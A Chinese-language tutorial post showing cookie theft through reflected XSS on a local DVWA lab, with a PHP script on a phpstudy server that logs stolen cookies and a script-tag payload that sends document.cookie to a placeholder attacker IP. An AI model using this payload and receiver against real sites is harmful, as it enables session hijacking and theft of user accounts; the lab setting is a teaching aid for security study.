前言

上一篇文章中介绍了XSS(跨站脚本攻击)简单原理与几种类型。接下来通过实例用几行代码实现cookie的盗取。

正文

这里测试用的工具是DVWA(可以本地搭建，前面文章有介绍），和phpstudy。首先登陆DVWA，选择low模式，点击submit按钮。如下图

然后咱们点击XSS(Reflected),首先输入 弹窗代码

<script>alert('XSS')</script>

然后界面弹窗，说明存在XSS跨站漏洞，如下图

接下来，打开phpstudy, 启动服务，点击创建网站，创建好之后，打开根目录,创建一个.php文件

然后.php文件里添加下面代码

<?php
$cookie = $_GET['cookie'];          //以GET方式获取cookie
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie ."n");           //写入文件并保存
fclose($log);
?> 

接下来在有XSS漏洞的地方，输入如下代码

<script>document.location='http://你的IP/getcookie.php?cookie='+document.cookie;</script>

受攻击的服务器的cookie信息就会发送到攻击者的服务器并保存

测试结束。

总结

一，安装phpstudy集成环境。

二，自己搭建有xss漏洞的站点进行测试，这里推荐DVWA

三，构造获取cookie的代码，就是简单的接收参数，和保存文件。

四，构造JavaScript代码，将受害者的cookie信息发送到攻击者服务器。

五，查看保存的信息。